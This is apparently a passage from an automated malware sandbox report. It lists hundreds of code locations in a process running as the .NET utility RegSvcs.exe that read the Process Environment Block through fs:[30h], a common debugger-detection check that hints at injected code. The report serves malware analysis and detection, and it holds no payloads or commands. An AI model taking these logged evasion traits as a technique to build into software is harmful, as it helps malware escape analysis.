Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015C80A0 mov eax, dword ptr fs:[00000030h]	9_2_015C80A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01652349 mov eax, dword ptr fs:[00000030h]	9_2_01652349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01652349 mov eax, dword ptr fs:[00000030h]	9_2_01652349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01652349 mov eax, dword ptr fs:[00000030h]	9_2_01652349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01652349 mov eax, dword ptr fs:[00000030h]	9_2_01652349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01652349 mov eax, dword ptr fs:[00000030h]	9_2_01652349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01652349 mov eax, dword ptr fs:[00000030h]	9_2_01652349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01652349 mov eax, dword ptr fs:[00000030h]	9_2_01652349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01652349 mov eax, dword ptr fs:[00000030h]	9_2_01652349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01652349 mov eax, dword ptr fs:[00000030h]	9_2_01652349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01652349 mov eax, dword ptr fs:[00000030h]	9_2_01652349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01652349 mov eax, dword ptr fs:[00000030h]	9_2_01652349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01652349 mov eax, dword ptr fs:[00000030h]	9_2_01652349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01652349 mov eax, dword ptr fs:[00000030h]	9_2_01652349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01652349 mov eax, dword ptr fs:[00000030h]	9_2_01652349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01652349 mov eax, dword ptr fs:[00000030h]	9_2_01652349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0163634C mov eax, dword ptr fs:[00000030h]	9_2_0163634C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0164035C mov eax, dword ptr fs:[00000030h]	9_2_0164035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0164035C mov eax, dword ptr fs:[00000030h]	9_2_0164035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0164035C mov eax, dword ptr fs:[00000030h]	9_2_0164035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0164035C mov eax, dword ptr fs:[00000030h]	9_2_0164035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0165035C mov eax, dword ptr fs:[00000030h]	9_2_0165035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0165035C mov eax, dword ptr fs:[00000030h]	9_2_0165035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0165035C mov eax, dword ptr fs:[00000030h]	9_2_0165035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0165035C mov ecx, dword ptr fs:[00000030h]	9_2_0165035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0165035C mov eax, dword ptr fs:[00000030h]	9_2_0165035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0165035C mov eax, dword ptr fs:[00000030h]	9_2_0165035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015F0310 mov ecx, dword ptr fs:[00000030h]	9_2_015F0310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015CC301 mov ecx, dword ptr fs:[00000030h]	9_2_015CC301
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0160A30B mov eax, dword ptr fs:[00000030h]	9_2_0160A30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0160A30B mov eax, dword ptr fs:[00000030h]	9_2_0160A30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0160A30B mov eax, dword ptr fs:[00000030h]	9_2_0160A30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D2324 mov eax, dword ptr fs:[00000030h]	9_2_015D2324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D83C0 mov eax, dword ptr fs:[00000030h]	9_2_015D83C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D83C0 mov eax, dword ptr fs:[00000030h]	9_2_015D83C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D83C0 mov eax, dword ptr fs:[00000030h]	9_2_015D83C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D83C0 mov eax, dword ptr fs:[00000030h]	9_2_015D83C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_016063FF mov eax, dword ptr fs:[00000030h]	9_2_016063FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_016563C0 mov eax, dword ptr fs:[00000030h]	9_2_016563C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015EE3F0 mov eax, dword ptr fs:[00000030h]	9_2_015EE3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015EE3F0 mov eax, dword ptr fs:[00000030h]	9_2_015EE3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015EE3F0 mov eax, dword ptr fs:[00000030h]	9_2_015EE3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E03E9 mov eax, dword ptr fs:[00000030h]	9_2_015E03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E03E9 mov eax, dword ptr fs:[00000030h]	9_2_015E03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E03E9 mov eax, dword ptr fs:[00000030h]	9_2_015E03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E03E9 mov eax, dword ptr fs:[00000030h]	9_2_015E03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E03E9 mov eax, dword ptr fs:[00000030h]	9_2_015E03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E03E9 mov eax, dword ptr fs:[00000030h]	9_2_015E03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E03E9 mov eax, dword ptr fs:[00000030h]	9_2_015E03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E03E9 mov eax, dword ptr fs:[00000030h]	9_2_015E03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015C8397 mov eax, dword ptr fs:[00000030h]	9_2_015C8397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015C8397 mov eax, dword ptr fs:[00000030h]	9_2_015C8397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015C8397 mov eax, dword ptr fs:[00000030h]	9_2_015C8397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015F438F mov eax, dword ptr fs:[00000030h]	9_2_015F438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015F438F mov eax, dword ptr fs:[00000030h]	9_2_015F438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015CE388 mov eax, dword ptr fs:[00000030h]	9_2_015CE388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015CE388 mov eax, dword ptr fs:[00000030h]	9_2_015CE388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015CE388 mov eax, dword ptr fs:[00000030h]	9_2_015CE388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D6259 mov eax, dword ptr fs:[00000030h]	9_2_015D6259
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015CA250 mov eax, dword ptr fs:[00000030h]	9_2_015CA250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01658243 mov eax, dword ptr fs:[00000030h]	9_2_01658243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01658243 mov ecx, dword ptr fs:[00000030h]	9_2_01658243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015C826B mov eax, dword ptr fs:[00000030h]	9_2_015C826B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D4260 mov eax, dword ptr fs:[00000030h]	9_2_015D4260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D4260 mov eax, dword ptr fs:[00000030h]	9_2_015D4260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D4260 mov eax, dword ptr fs:[00000030h]	9_2_015D4260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E0218 mov eax, dword ptr fs:[00000030h]	9_2_015E0218
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015C823B mov eax, dword ptr fs:[00000030h]	9_2_015C823B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015DA2C3 mov eax, dword ptr fs:[00000030h]	9_2_015DA2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015DA2C3 mov eax, dword ptr fs:[00000030h]	9_2_015DA2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015DA2C3 mov eax, dword ptr fs:[00000030h]	9_2_015DA2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015DA2C3 mov eax, dword ptr fs:[00000030h]	9_2_015DA2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015DA2C3 mov eax, dword ptr fs:[00000030h]	9_2_015DA2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E02E1 mov eax, dword ptr fs:[00000030h]	9_2_015E02E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E02E1 mov eax, dword ptr fs:[00000030h]	9_2_015E02E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E02E1 mov eax, dword ptr fs:[00000030h]	9_2_015E02E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0160E284 mov eax, dword ptr fs:[00000030h]	9_2_0160E284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0160E284 mov eax, dword ptr fs:[00000030h]	9_2_0160E284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01650283 mov eax, dword ptr fs:[00000030h]	9_2_01650283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01650283 mov eax, dword ptr fs:[00000030h]	9_2_01650283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01650283 mov eax, dword ptr fs:[00000030h]	9_2_01650283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E02A0 mov eax, dword ptr fs:[00000030h]	9_2_015E02A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E02A0 mov eax, dword ptr fs:[00000030h]	9_2_015E02A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0160656A mov eax, dword ptr fs:[00000030h]	9_2_0160656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0160656A mov eax, dword ptr fs:[00000030h]	9_2_0160656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0160656A mov eax, dword ptr fs:[00000030h]	9_2_0160656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015FE53E mov eax, dword ptr fs:[00000030h]	9_2_015FE53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015FE53E mov eax, dword ptr fs:[00000030h]	9_2_015FE53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015FE53E mov eax, dword ptr fs:[00000030h]	9_2_015FE53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015FE53E mov eax, dword ptr fs:[00000030h]	9_2_015FE53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015FE53E mov eax, dword ptr fs:[00000030h]	9_2_015FE53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E0535 mov eax, dword ptr fs:[00000030h]	9_2_015E0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E0535 mov eax, dword ptr fs:[00000030h]	9_2_015E0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E0535 mov eax, dword ptr fs:[00000030h]	9_2_015E0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E0535 mov eax, dword ptr fs:[00000030h]	9_2_015E0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E0535 mov eax, dword ptr fs:[00000030h]	9_2_015E0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E0535 mov eax, dword ptr fs:[00000030h]	9_2_015E0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D65D0 mov eax, dword ptr fs:[00000030h]	9_2_015D65D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0160C5ED mov eax, dword ptr fs:[00000030h]	9_2_0160C5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0160C5ED mov eax, dword ptr fs:[00000030h]	9_2_0160C5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0160E5CF mov eax, dword ptr fs:[00000030h]	9_2_0160E5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0160E5CF mov eax, dword ptr fs:[00000030h]	9_2_0160E5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0160A5D0 mov eax, dword ptr fs:[00000030h]	9_2_0160A5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0160A5D0 mov eax, dword ptr fs:[00000030h]	9_2_0160A5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015FE5E7 mov eax, dword ptr fs:[00000030h]	9_2_015FE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015FE5E7 mov eax, dword ptr fs:[00000030h]	9_2_015FE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015FE5E7 mov eax, dword ptr fs:[00000030h]	9_2_015FE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015FE5E7 mov eax, dword ptr fs:[00000030h]	9_2_015FE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015FE5E7 mov eax, dword ptr fs:[00000030h]	9_2_015FE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015FE5E7 mov eax, dword ptr fs:[00000030h]	9_2_015FE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015FE5E7 mov eax, dword ptr fs:[00000030h]	9_2_015FE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015FE5E7 mov eax, dword ptr fs:[00000030h]	9_2_015FE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D25E0 mov eax, dword ptr fs:[00000030h]	9_2_015D25E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015CA580 mov ecx, dword ptr fs:[00000030h]	9_2_015CA580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015CA580 mov eax, dword ptr fs:[00000030h]	9_2_015CA580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D2582 mov eax, dword ptr fs:[00000030h]	9_2_015D2582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D2582 mov ecx, dword ptr fs:[00000030h]	9_2_015D2582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01604588 mov eax, dword ptr fs:[00000030h]	9_2_01604588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015F45B1 mov eax, dword ptr fs:[00000030h]	9_2_015F45B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015F45B1 mov eax, dword ptr fs:[00000030h]	9_2_015F45B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0160E59C mov eax, dword ptr fs:[00000030h]	9_2_0160E59C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0165C460 mov ecx, dword ptr fs:[00000030h]	9_2_0165C460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015F245A mov eax, dword ptr fs:[00000030h]	9_2_015F245A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0160E443 mov eax, dword ptr fs:[00000030h]	9_2_0160E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0160E443 mov eax, dword ptr fs:[00000030h]	9_2_0160E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0160E443 mov eax, dword ptr fs:[00000030h]	9_2_0160E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0160E443 mov eax, dword ptr fs:[00000030h]	9_2_0160E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0160E443 mov eax, dword ptr fs:[00000030h]	9_2_0160E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0160E443 mov eax, dword ptr fs:[00000030h]	9_2_0160E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0160E443 mov eax, dword ptr fs:[00000030h]	9_2_0160E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0160E443 mov eax, dword ptr fs:[00000030h]	9_2_0160E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015DA471 mov eax, dword ptr fs:[00000030h]	9_2_015DA471
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015FA470 mov eax, dword ptr fs:[00000030h]	9_2_015FA470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015FA470 mov eax, dword ptr fs:[00000030h]	9_2_015FA470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015FA470 mov eax, dword ptr fs:[00000030h]	9_2_015FA470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01656420 mov eax, dword ptr fs:[00000030h]	9_2_01656420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01656420 mov eax, dword ptr fs:[00000030h]	9_2_01656420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01656420 mov eax, dword ptr fs:[00000030h]	9_2_01656420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01656420 mov eax, dword ptr fs:[00000030h]	9_2_01656420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01656420 mov eax, dword ptr fs:[00000030h]	9_2_01656420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01656420 mov eax, dword ptr fs:[00000030h]	9_2_01656420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01656420 mov eax, dword ptr fs:[00000030h]	9_2_01656420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0160A430 mov eax, dword ptr fs:[00000030h]	9_2_0160A430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01608402 mov eax, dword ptr fs:[00000030h]	9_2_01608402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01608402 mov eax, dword ptr fs:[00000030h]	9_2_01608402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01608402 mov eax, dword ptr fs:[00000030h]	9_2_01608402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015CC427 mov eax, dword ptr fs:[00000030h]	9_2_015CC427
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015CE420 mov eax, dword ptr fs:[00000030h]	9_2_015CE420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015CE420 mov eax, dword ptr fs:[00000030h]	9_2_015CE420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015CE420 mov eax, dword ptr fs:[00000030h]	9_2_015CE420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D04E5 mov ecx, dword ptr fs:[00000030h]	9_2_015D04E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_016044B0 mov ecx, dword ptr fs:[00000030h]	9_2_016044B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0165A4B0 mov eax, dword ptr fs:[00000030h]	9_2_0165A4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D6484 mov eax, dword ptr fs:[00000030h]	9_2_015D6484
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015C64BA mov eax, dword ptr fs:[00000030h]	9_2_015C64BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D64AB mov eax, dword ptr fs:[00000030h]	9_2_015D64AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D0750 mov eax, dword ptr fs:[00000030h]	9_2_015D0750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015CA740 mov eax, dword ptr fs:[00000030h]	9_2_015CA740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D8770 mov eax, dword ptr fs:[00000030h]	9_2_015D8770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0160674D mov esi, dword ptr fs:[00000030h]	9_2_0160674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0160674D mov eax, dword ptr fs:[00000030h]	9_2_0160674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0160674D mov eax, dword ptr fs:[00000030h]	9_2_0160674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E0770 mov eax, dword ptr fs:[00000030h]	9_2_015E0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E0770 mov eax, dword ptr fs:[00000030h]	9_2_015E0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E0770 mov eax, dword ptr fs:[00000030h]	9_2_015E0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E0770 mov eax, dword ptr fs:[00000030h]	9_2_015E0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E0770 mov eax, dword ptr fs:[00000030h]	9_2_015E0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E0770 mov eax, dword ptr fs:[00000030h]	9_2_015E0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E0770 mov eax, dword ptr fs:[00000030h]	9_2_015E0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E0770 mov eax, dword ptr fs:[00000030h]	9_2_015E0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E0770 mov eax, dword ptr fs:[00000030h]	9_2_015E0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E0770 mov eax, dword ptr fs:[00000030h]	9_2_015E0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E0770 mov eax, dword ptr fs:[00000030h]	9_2_015E0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E0770 mov eax, dword ptr fs:[00000030h]	9_2_015E0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01654755 mov eax, dword ptr fs:[00000030h]	9_2_01654755
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01612750 mov eax, dword ptr fs:[00000030h]	9_2_01612750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01612750 mov eax, dword ptr fs:[00000030h]	9_2_01612750
